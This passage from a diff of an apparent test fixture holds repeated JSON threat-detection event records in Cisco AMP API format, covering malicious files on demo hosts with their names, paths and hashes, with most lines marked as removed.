Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":926000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} @@ -46,917 +38,5 @@ {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668885361590000,"timestamp":1610705877,"timestamp_nanoseconds":260000000,"date":"2021-01-15T10:17:57+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668885361590307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259135965757000,"timestamp":1610705870,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259135965757532","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} {"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900291000600,"timestamp":1610705861,"timestamp_nanoseconds":291000000,"date":"2021-01-15T10:17:41+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705861,"start_date":"2021-01-15T10:17:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251520740131000,"timestamp":1610705860,"timestamp_nanoseconds":3000000,"date":"2021-01-15T10:17:40+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251520740130915","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":988000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163618","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":988000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163617","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":894000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163616","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":894000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163615","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":894000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163614","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":878000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163613","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":878000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163612","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":863000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163611","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":863000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163610","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":816000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163609","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":738000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163608","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":722000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163607","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":722000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":691000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163605","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":691000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163604","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":644000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6159251516445163603","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251516445164000,"timestamp":1610705859,"timestamp_nanoseconds":629000000,"date":"2021-01-15T10:17:39+00:00","event_type":"Threat 